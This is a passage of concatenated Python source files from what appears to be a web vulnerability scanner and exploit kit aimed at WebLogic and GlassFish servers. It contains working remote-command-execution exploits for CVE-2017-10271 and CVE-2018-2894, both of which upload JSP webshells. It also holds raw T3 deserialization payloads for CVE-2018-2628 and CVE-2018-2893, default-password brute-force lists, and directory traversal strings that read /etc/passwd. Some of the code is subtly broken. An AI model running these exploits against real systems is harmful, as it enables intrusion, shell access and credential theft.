-> 172.16.80.131:7001 or https://172.16.80.131)') 104 | parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"') 105 | parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp') 106 | parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload') 107 | parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') 108 | args = parse.parse_args() 109 | 110 | #是否使用proxy 111 | if not args.proxy: 112 | proxies = None 113 | status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell) 114 | #output result: 115 | if status: 116 | print result 117 | else: 118 | print '[-]FAIL:{}'.format(result) 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /old_plugins/glassfish.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | from user_agent import get_user_agent 4 | def glassfish_weak1(host): 5 | try: 6 | url = "https://%s" % (host) 7 | headers = {'User-Agent': get_user_agent()} 8 | flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', 9 | '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"', 10 | 'src="/header.jsf"', 'Common Tasks', 'title="Logout from GlassFish'] 11 | user_list = ['admin'] 12 | pass_list = ['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888', 13 | 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'] 14 | for user in user_list: 15 | for password in pass_list: 16 | try: 17 | PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % ( 18 | user, password) 19 | s = requests.post(url + '/common/j_security_check', data=PostStr, header=headers) 20 | res_html = s.text 21 | except Exception: 22 | return "/common/j_security_check no exist glassfish weak password" 23 | for flag in flag_list: 24 | if flag in res_html: 25 | info = '%s/common GlassFish Weak password %s:%s' % (url, user, password) 26 | return 'YES|' + info 27 | return "/common/j_security_check no exist glassfish weak password" 28 | except Exception: 29 | return "/common/j_security_check no exist glassfish weak password" 30 | def glassfish_weak2(host): 31 | try: 32 | url = "http://%s" % (host) 33 | headers = {'User-Agent': get_user_agent()} 34 | flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', 35 | '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"', 36 | 'src="/header.jsf"', 'src="/index.jsf"', 'Common Tasks', 37 | 'title="Logout from GlassFish'] 38 | user_list = ['admin'] 39 | pass_list = ['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123', 40 | 'admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'] 41 | for user in user_list: 42 | for password in pass_list: 43 | try: 44 | PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % ( 45 | user, password) 46 | res = requests.post(url + '/j_security_check?loginButton=Login', data=PostStr, headers=headers) 47 | res_html = res.text 48 | except Exception: 49 | return "no exist index.jsf GlassFish Weak password" 50 | for flag in flag_list: 51 | if flag in res_html: 52 | info = '%s/index.jsf GlassFish Weak password %s:%s' % (url, user, password) 53 | return 'YES|' + info 54 | return "no exist index.jsf GlassFish Weak password" 55 | except Exception: 56 | return "no exist index.jsf GlassFish Weak password" 57 | def glassfish_Directory_traversal(url): 58 | #https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 59 | try: 60 | headers = {'User-Agent': get_user_agent()} 61 | poc = [ 62 | "/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", 63 | "/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", 64 | "/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", 65 | "/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", 66 | "/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", 67 | "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" 68 | "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/etc/passwd" 69 | ] 70 | flag = ["[fonts]", "root"] 71 | for i in poc: 72 | url = url + i 73 | s = requests.get(url=url, headers=headers) 74 | for j in flag: 75 | if j in s.text: 76 | return "exist Directory_traversal vuln" 77 | return "no exist Directory_traversal vuln" 78 | except Exception: 79 | return "no exist Directory_traversal vuln" 80 | def glassfish(url): 81 | a=glassfish_weak1(url) 82 | print(a) 83 | b=glassfish_weak2(url) 84 | print(b) 85 | c=glassfish_Directory_traversal(url) 86 | print(c) 87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /plugins/weblogic_exp/CVE_2018_2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import re 12 | import sys 13 | import time 14 | import argparse 15 | import requests 16 | import traceback 17 | import xml.etree.ElementTree as ET 18 | 19 | 20 | def get_current_work_path(host): 21 | geturl = host + "/ws_utc/resources/setting/options/general" 22 | ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} 23 | values = [] 24 | try: 25 | request = requests.get(geturl) 26 | if request.status_code == 404: 27 | exit("[-] {} don't exists CVE-2018-2894".format(host)) 28 | elif "Deploying Application".lower() in request.text.lower(): 29 | print("[*] First Deploying Website Please wait a moment ...") 30 | time.sleep(20) 31 | request = requests.get(geturl, headers=ua) 32 | if "" in request.content: 33 | root = ET.fromstring(request.content) 34 | value = root.find("section").find("options") 35 | for e in value: 36 | for sub in e: 37 | if e.tag == "parameter" and sub.tag == "defaultValue": 38 | values.append(sub.text) 39 | except requests.ConnectionError: 40 | exit("[-] Cannot connect url: {}".format(geturl)) 41 | if values: 42 | return values[0] 43 | else: 44 | print("[-] Cannot get current work path\n") 45 | exit(request.content) 46 | 47 | 48 | def get_new_work_path(host): 49 | origin_work_path = get_current_work_path(host) 50 | works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css" 51 | if "user_projects" in origin_work_path: 52 | if "\\" in origin_work_path: 53 | works = works.replace("/", "\\") 54 | current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains" 55 | dir_len = len(current_work_home.split("\\")) 56 | domain_name = origin_work_path.split("\\")[dir_len] 57 | current_work_home += "\\" + domain_name + works 58 | else: 59 | current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains" 60 | dir_len = len(current_work_home.split("/")) 61 | domain_name = origin_work_path.split("/")[dir_len] 62 | current_work_home += "/" + domain_name + works 63 | else: 64 | current_work_home = origin_work_path 65 | print("[*] cannot handle current work home dir: {}".format(origin_work_path)) 66 | return current_work_home 67 | 68 | 69 | def set_new_upload_path(host, path): 70 | data = { 71 | "setting_id": "general", 72 | "BasicConfigOptions.workDir": path, 73 | "BasicConfigOptions.proxyHost": "", 74 | "BasicConfigOptions.proxyPort": "80"} 75 | request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) 76 | if "successfully" in request.content: 77 | return True 78 | else: 79 | print("[-] Change New Upload Path failed") 80 | exit(request.content) 81 | 82 | 83 | def upload_webshell(host, uri): 84 | set_new_upload_path(host, get_new_work_path(host)) 85 | files = { 86 | "ks_edit_mode": "false", 87 | "ks_password_front": password, 88 | "ks_password_changed": "true", 89 | "ks_filename": ("360sglab.jsp", upload_content) 90 | } 91 | 92 | request = requests.post(host + uri, files=files) 93 | response = request.text 94 | match = re.findall("(.*?)", response) 95 | if match: 96 | tid = match[-1] 97 | shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp" 98 | if upload_content in requests.get(shell_path, headers=headers).content: 99 | print("[+] {} exists CVE-2018-2894".format(host)) 100 | print("[+] Check URL: {} ".format(shell_path)) 101 | else: 102 | print("[-] {} don't exists CVE-2018-2894".format(host)) 103 | else: 104 | print("[-] {} don't exists CVE-2018-2894".format(host)) 105 | 106 | 107 | if __name__ == "__main__": 108 | start = time.time() 109 | password = "360sglab" 110 | url = "/ws_utc/resources/setting/keystore" 111 | parser = argparse.ArgumentParser() 112 | parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str, 113 | help="target, such as: http://example.com:7001") 114 | 115 | upload_content = "360sglab test" 116 | headers = { 117 | 'Content-Type': 'application/x-www-form-urlencoded', 118 | 'X-Requested-With': 'XMLHttpRequest', } 119 | 120 | if len(sys.argv) == 1: 121 | sys.argv.append('-h') 122 | args = parser.parse_args() 123 | target = args.target 124 | 125 | target = target.rstrip('/') 126 | if "://" not in target: 127 | target = "http://" + target 128 | try: 129 | upload_webshell(target, url) 130 | except Exception as e: 131 | print("[-] Error: \n") 132 | traceback.print_exc() -------------------------------------------------------------------------------- /plugins/weblogic_exp/CVE_2017_10271_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import requests 12 | import argparse 13 | import time 14 | import base64 15 | proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} 16 | headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} 17 | timeout = 5 18 | ''' 19 | payload的格式化 20 | ''' 21 | def payload_command(command_in,output_file,os): 22 | html_escape_table = { 23 | "&": "&", 24 | '"': """, 25 | "'": "'", 26 | ">": ">", 27 | "<": "<", 28 | } 29 | #命令执行回显:将命令执行的结果输出到文件中 30 | #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file) 31 | command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file) 32 | command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in_payload)+"" 33 | #XMLDecoder反序列化payload: 34 | cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe' 35 | cmd_param = '-c' if os == 'linux' else '/c' 36 | 37 | payload_1 = " \n" \ 38 | " " \ 39 | " \n" \ 40 | " \n" \ 41 | " \n" \ 42 | " " \ 43 | " " \ 44 | " {} " \ 45 | " " \ 46 | " " \ 47 | " {} " \ 48 | " " \ 49 | " ".format(cmd_app,cmd_param) \ 50 | + command_filtered + \ 51 | " " \ 52 | " " \ 53 | " " \ 54 | " " \ 55 | " " \ 56 | " " \ 57 | " " \ 58 | " " \ 59 | "" 60 | return payload_1 61 | 62 | ''' 63 | 得到命令执行的回显结果 64 | ''' 65 | def get_output(target,output_file): 66 | if not target.startswith('http'): 67 | target = 'http://{}'.format(target) 68 | #url增加时间戳避免数据是上一次的结果缓存 69 | output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) 70 | try: 71 | r = requests.get(output_url,headers = headers,proxies=proxies,timeout=timeout,verify=False) 72 | if r.status_code == requests.codes.ok: 73 | return (True,(r.text.strip())) 74 | elif r.status_code == 404: 75 | return (False,'404 no output') 76 | else: 77 | return (False,r.status_code) 78 | except Exception,ex: 79 | #raise 80 | return (False,str(ex)) 81 | 82 | ''' 83 | RCE 84 | ''' 85 | def weblogic_rce(target,cmd,output_file,os='linux'): 86 | if not target.startswith('http'): 87 | target = 'http://{}'.format(target) 88 | url = '{}/wls-wsat/CoordinatorPortType'.format(target) 89 | #content-type必须为text/xml 90 | payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} 91 | msg = '' 92 | try: 93 | r = requests.post(url, payload_command(cmd,output_file,os),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) 94 | #500时说明已成功反序列化执行命令 95 | if r.status_code == 500: 96 | #delay一下,保证命令执行完整性: 97 | time.sleep(1) 98 | return get_output(target,output_file) 99 | elif r.status_code == 404: 100 | return (False,'404 no vulnerability') 101 | else: 102 | return (False,'{} something went wrong'.format(r.status_code)) 103 | except requests.exceptions.ReadTimeout: 104 | return (False,'timeout') 105 | except Exception,ex: 106 | #raise 107 | return (False,str(ex)) 108 | 109 | ''' 110 | getshell 111 | ''' 112 | def weblogic_getshell(target,output_file,shell_file,os='linux'): 113 | if not target.startswith('http'): 114 | target = 'http://{}'.format(target) 115 | with open(shell_file) as f: 116 | cmd = 'echo {}|base64 -d'.format(base64.b64encode(f.read())) 117 | status,result = weblogic_rce(target,cmd,output_file,os) 118 | if status: 119 | print '[+]shell-> {}/bea_wls_internal/{}'.format(target,output_file) 120 | return (status,result) 121 | ''' 122 | main 123 | ''' 124 | def main(): 125 | global proxies 126 | 127 | parse = argparse.ArgumentParser() 128 | parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') 129 | parse.add_argument('-c', '--cmd', required=False,default='id', help='command to execute,default is "id"') 130 | parse.add_argument('-o', '--output', required=False,default='output.txt', help='output file name,default is output.txt') 131 | parse.add_argument('-s', '--shell', required = False,default='',help='local jsp file name to upload,and set -o xxx.jsp') 132 | parse.add_argument('--os',choices=['linux','win'],default='linux',help='host os:linux or win,default is linux') 133 | parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') 134 | args = parse.parse_args() 135 | 136 | #是否使用proxy 137 | if not args.proxy: 138 | proxies = None 139 | if args.shell!='': 140 | status,result = weblogic_getshell(args.target,args.output,args.shell,args.os) 141 | else: 142 | status,result = weblogic_rce(args.target,args.cmd,args.output,args.os) 143 | #output result: 144 | if status: 145 | print result 146 | else: 147 | print '[-]FAIL:{}'.format(result) 148 | 149 | if __name__ == '__main__': 150 | main() 151 | -------------------------------------------------------------------------------- /plugins/plugins.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import requests 4 | import os 5 | import json 6 | import traceback 7 | from concurrent.futures import ThreadPoolExecutor 8 | from plugins.special_plugin_ import special_plugin_ 9 | sys.path.append("plugins") 10 | import plugins 11 | current_file=os.path.dirname(os.path.abspath(__file__)) 12 | from user_agent import get_user_agent 13 | class plugins(object): 14 | def __init__(self,arg,config): 15 | self.arg=arg 16 | self.config=config 17 | self.url=arg.url 18 | self.options=arg.options 19 | self.ThreadNum=config.ThreadNum 20 | self.Timeout=config.Timeout 21 | self.vuln=[] 22 | self.port=config.port 23 | def run(self): 24 | print("\n第一部分standard_poc 测试开始:") 25 | print("***********************") 26 | files=os.listdir(current_file) 27 | list_8080=["axis","glassfish","jboss","resin","spring","tomcat","struts2"] 28 | with ThreadPoolExecutor(self.ThreadNum) as excetor: 29 | for file in files: 30 | if "_plugin.py" in file: 31 | module = file.rstrip(".py") 32 | pocs = __import__(module).pocs 33 | module=module.strip("_plugin") 34 | if module in list_8080: 35 | self.port=8080 36 | if module in ["weblogic"]: 37 | self.port=7001 38 | excetor.submit(self.check(pocs)) 39 | if self.vuln: 40 | print("\n\n\n第一部分 standard_poc 测试出的漏洞有:") 41 | for vuln in self.vuln: 42 | print(vuln) 43 | else: 44 | print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。") 45 | print("\n\n\n第二部分:\n开始测试特定的poc脚本:") 46 | print("***********************") 47 | special_plugin_(self.arg,self.config) 48 | def request_get(self,url,params,data,flags,success_num,success,fail,pocs): 49 | try: 50 | headers = get_user_agent() 51 | s = requests.get(url=url+":"+self.port, params=params, headers=headers,timeout=self.Timeout) 52 | if not flags: 53 | if s.status_code!=404: 54 | self.vuln.append(self.url+success) 55 | for flag in flags: 56 | if flag in s.text: 57 | success_num = success_num + 1 58 | if success_num > 0: 59 | self.vuln.append(success + " \npocs: \n" + pocs) 60 | print(success + " \npocs: \n" + pocs) 61 | except Exception: 62 | success_num=success_num+1 63 | if success_num<=2: 64 | self.request_get(url, params, data, flags, success_num,success,fail,pocs) 65 | def request_post(self,url,params,data,flag,success_num,username,password,success,fail,pocs): 66 | try: 67 | headers = {'User-Agent': get_user_agent()} 68 | s = requests.post(url=url+":"+self.port, data=data, headers=headers,timeout=self.Timeout) 69 | for flag in poc["flag"]: 70 | if flag in s.text: 71 | success_num = success_num + 1 72 | if success_num > 0: 73 | if pocs["admin_bursk"]==True: 74 | self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) 75 | print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) 76 | else: 77 | self.vuln.append(success + " \n pocs: \n" + pocs) 78 | print(success + " \n pocs: \n" + pocs) 79 | except Exception: 80 | success_num=success_num+1 81 | if success_num<=2: 82 | self.request_post(url,params,data,flag,success_num,username,password,success,fail,pocs) 83 | def check(self,pocs): 84 | with ThreadPoolExecutor(self.ThreadNum) as excetor: 85 | for poc in pocs: 86 | for url in poc["url"]: 87 | try: 88 | url = self.url + url 89 | if poc["requests_option"] == "GET": 90 | if not poc["params"]: 91 | poc["params"].append("seize") 92 | for params in poc["params"]: 93 | success_num = 0 94 | try: 95 | excetor.submit(self.request_get(url, params, poc["data"], poc["flag"], success_num, poc["success"],poc["fail"],poc)) 96 | except Exception: 97 | print(traceback.print_exc()) 98 | if poc["requests_option"] == "POST": 99 | if not poc["data"]: 100 | poc["data"].append("seize") 101 | for data in poc["data"]: 102 | try: 103 | if poc["admin_bursk"] == "True": 104 | for username in poc["username"]: 105 | for password in poc["password"]: 106 | success_num = 0 107 | try: 108 | excetor.submit(self.request_post(url, poc["params"], data, poc["flag"],success_num, username, password, poc["success"],poc["fail"],poc)) 109 | except Exception: 110 | print(traceback.print_exc()) 111 | except Exception: 112 | print(traceback.print_exc()) 113 | else: 114 | success_num = 0 115 | try: 116 | for data in poc["data"]: 117 | success_num = 0 118 | try: 119 | excetor.submit(self.request_post(url, poc["params"], data, poc["flag"], success_num,poc["username"], poc["password"], poc["success"],poc["fail"],poc)) 120 | except Exception: 121 | print(traceback.print_exc()) 122 | except Exception: 123 | print(traceback.print_exc()) 124 | except Exception: 125 | print(traceback.print_exc()) 126 | if poc["end"]: 127 | if "/" in poc["end"]: 128 | print(self.url+poc["end"]) 129 | else: 130 | print(self.url+" "+poc["end"]) 131 | -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2018_2628.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | 17 | VUL=['CVE-2018-2628'] 18 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 19 | VER_SIG=['\\$Proxy[0-9]+'] 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.settimeout(6) 24 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 25 | time.sleep(1) 26 | sock.recv(1024) 27 | # print 'handshake successful' 28 | 29 | def buildT3RequestObject(sock,dport): 30 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 31 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) 32 | data3 = '1a7727000d3234322e323134' 33 | data4 = '2e312e32353461863d1d0000000078' 34 | for d in [data1,data2,data3,data4]: 35 | sock.send(d.decode('hex')) 36 | time.sleep(2) 37 | # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 38 | 39 | 40 | def sendEvilObjData(sock,data): 41 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 42 | payload+=data 43 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 44 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 45 | sock.send(payload.decode('hex')) 46 | time.sleep(2) 47 | sock.send(payload.decode('hex')) 48 | res = '' 49 | try: 50 | while True: 51 | res += sock.recv(4096) 52 | time.sleep(0.1) 53 | except Exception as e: 54 | pass 55 | return res 56 | 57 | def checkVul(res,server_addr,index): 58 | p=re.findall(VER_SIG[index], res, re.S) 59 | if len(p)>0: 60 | # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 61 | print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) 62 | else: 63 | # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 64 | print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) 65 | 66 | def run(dip,dport,index): 67 | try: 68 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 69 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 70 | sock.settimeout(10) 71 | server_addr = (dip, dport) 72 | t3handshake(sock, server_addr) 73 | buildT3RequestObject(sock, dport) 74 | rs = sendEvilObjData(sock, PAYLOAD[index]) 75 | # print 'rs',rs 76 | checkVul(rs, server_addr, index) 77 | except Exception: 78 | print("CVE_2018_2628脚本出错") 79 | 80 | 81 | if __name__=="__main__": 82 | dip = sys.argv[1] 83 | dport = int(sys.argv[2]) 84 | run(dip,dport,0) -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2018_2893.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | import sys 15 | 16 | VUL=['CVE-2018-2893'] 17 | 18 | PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878'] 19 | 20 | VER_SIG=['StreamMessageImpl'] 21 | 22 | def t3handshake(sock,server_addr): 23 | sock.connect(server_addr) 24 | sock.settimeout(6) 25 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 26 | time.sleep(1) 27 | data = sock.recv(1024) 28 | 29 | 30 | def buildT3RequestObject(sock,port): 31 | data1 = 